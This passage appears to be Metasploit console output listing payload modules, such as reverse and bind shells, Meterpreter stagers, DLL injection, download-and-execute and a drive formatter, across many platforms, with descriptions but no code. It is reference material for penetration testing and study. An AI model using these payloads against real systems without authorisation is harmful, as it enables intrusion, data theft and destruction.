Linux Execute Command - linux/mipsbe/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/mipsbe/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mipsbe/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mipsbe/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsbe/reboot normal No Linux Reboot - linux/mipsbe/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/mipsbe/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/mipsbe/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/mipsle/exec normal No Linux Execute Command - linux/mipsle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager - linux/mipsle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/mipsle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/mipsle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/mipsle/reboot normal No Linux Reboot - linux/mipsle/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/mipsle/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/mipsle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppc/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppc/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/ppc/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/ppc/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/ppc/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/ppc64/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/ppc64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/ppc64le/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppc64le/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppc64le/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/ppce500v2/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/ppce500v2/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/ppce500v2/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x64/exec normal No Linux Execute Command - linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager - linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager - linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager - linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline - linux/x64/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/x86/adduser normal No Linux Add User - linux/x86/chmod normal No Linux Chmod - linux/x86/exec normal No Linux Execute Command - linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) - linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) - linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager - linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86) - linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) - linux/x86/meterpreter/find_tag normal No Linux Mettle x86, Find Tag Stager - linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6) - linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager - linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP - linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline - linux/x86/read_file normal No Linux Read File - linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) - linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) - linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager - linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86) - linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) - linux/x86/shell/find_tag normal No Linux Command Shell, Find Tag Stager - linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6) - linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager - linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6) - linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline - linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline - linux/x86/shell_find_port normal No Linux Command Shell, Find Port Inline - linux/x86/shell_find_tag normal No Linux Command Shell, Find Tag Inline - linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline - linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) - linux/zarch/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline - linux/zarch/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline - linux/zarch/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline - mainframe/shell_reverse_tcp normal No Z/OS (MVS) Command Shell, Reverse TCP Inline - multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures) - multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures) - netware/shell/reverse_tcp normal No NetWare Command Shell, Reverse TCP Stager - nodejs/shell_bind_tcp normal No Command Shell, Bind TCP (via nodejs) - nodejs/shell_reverse_tcp normal No Command Shell, Reverse TCP (via nodejs) - nodejs/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via nodejs) - osx/armle/execute/bind_tcp normal No OS X Write and Execute Binary, Bind TCP Stager - osx/armle/execute/reverse_tcp normal No OS X Write and Execute Binary, Reverse TCP Stager - osx/armle/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager - osx/armle/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager - osx/armle/shell_bind_tcp normal No Apple iOS Command Shell, Bind TCP Inline - osx/armle/shell_reverse_tcp normal No Apple iOS Command Shell, Reverse TCP Inline - osx/armle/vibrate normal No Apple iOS iPhone Vibrate - osx/ppc/shell/bind_tcp normal No OS X Command Shell, Bind TCP Stager - osx/ppc/shell/find_tag normal No OS X Command Shell, Find Tag Stager - osx/ppc/shell/reverse_tcp normal No OS X Command Shell, Reverse TCP Stager - osx/ppc/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline - osx/ppc/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline - osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager - osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager - osx/x64/exec normal No OS X x64 Execute Command - osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager - osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager - osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline - osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline - osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline - osx/x64/say normal No OS X x64 say Shellcode - osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP - osx/x64/shell_find_tag normal No OSX Command Shell, Find Tag Inline - osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP - osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager - osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager - osx/x86/exec normal No OS X Execute Command - osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager - osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager - osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline - osx/x86/shell_find_port normal No OS X Command Shell, Find Port Inline - osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline - osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager - osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager - osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline - osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline - php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl) - php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6 - php/bind_php normal No PHP Command Shell, Bind TCP (via PHP) - php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6 - php/download_exec normal No PHP Executable Download and Execute - php/exec normal No PHP Execute Command - php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager - php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6 - php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support - php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support - php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager - php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager - php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline - php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl) - php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP) - php/shell_findsock normal No PHP Command Shell, Find Sock - python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager - python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support - python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager - python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager - python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager - python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager - python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support - python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline - python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline - python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline - python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline - python/shell_bind_tcp normal No Command Shell, Bind TCP (via python) - python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python) - python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python) - python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python) - r/shell_bind_tcp normal No R Command Shell, Bind TCP - r/shell_reverse_tcp normal No R Command Shell, Reverse TCP - ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP - ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6 - ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP - ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL - solaris/sparc/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline - solaris/sparc/shell_find_port normal No Solaris Command Shell, Find Port Inline - solaris/sparc/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline - solaris/x86/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline - solaris/x86/shell_find_port normal No Solaris Command Shell, Find Port Inline - solaris/x86/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline - tty/unix/interact normal No Unix TTY, Interact with Established Connection - windows/adduser normal No Windows Execute net user /ADD - windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager - windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager - windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) - windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager - windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7) - windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86) - windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) - windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager - windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager - windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) - windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy - windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6) - windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) - windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) - windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager - windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager - windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS) - windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support - windows/dllinject/reverse_udp normal No Reflective DLL Injection, Reverse UDP Stager with UUID Support - windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) - windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution - windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute - windows/exec normal No Windows Execute Command - windows/format_all_drives manual No Windows Drive Formatter - windows/loadlibrary normal No Windows LoadLibrary Path - windows/messagebox normal No Windows MessageBox - windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager - windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager - windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) - windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager - windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) - windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) - windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager - windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager - windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) - windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy - windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) - windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy - windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) - windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager - windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) - windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager - windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager - windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) - windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support - windows/meterpreter/reverse_udp normal No Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support - windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) - windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) - windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline - windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline - windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline - windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline - windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) - windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline - windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP - windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline - windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager - windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager - windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) - windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager - windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7) - windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86) - windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) - windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager - windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6) - windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7) - windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) - windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager - windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager - windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS) - windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support - windows/patchupdllinject/reverse_udp normal No Windows Inject DLL, Reverse UDP Stager with UUID Support - windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager - windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager - windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) - windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager - windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) - windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) - windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) - windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager - windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) - windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) - windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) - windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager - windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager - windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) - windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support - windows/patchupmeterpreter/reverse_udp normal No Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support - windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP - windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP - windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager - windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager - windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) - windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager - windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7) - windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86) - windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) - windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager - windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6) - windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7) - windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) - windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager - windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager - windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS) - windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support - windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support - windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline - windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline - windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline - windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline - windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!" - windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager - windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager - windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) - windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) - windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager - windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7) - windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86) - windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) - windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) - windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager - windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6) - windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) - windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) - windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager - windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager - windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS) - windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm) - windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) - windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support - windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support - windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), 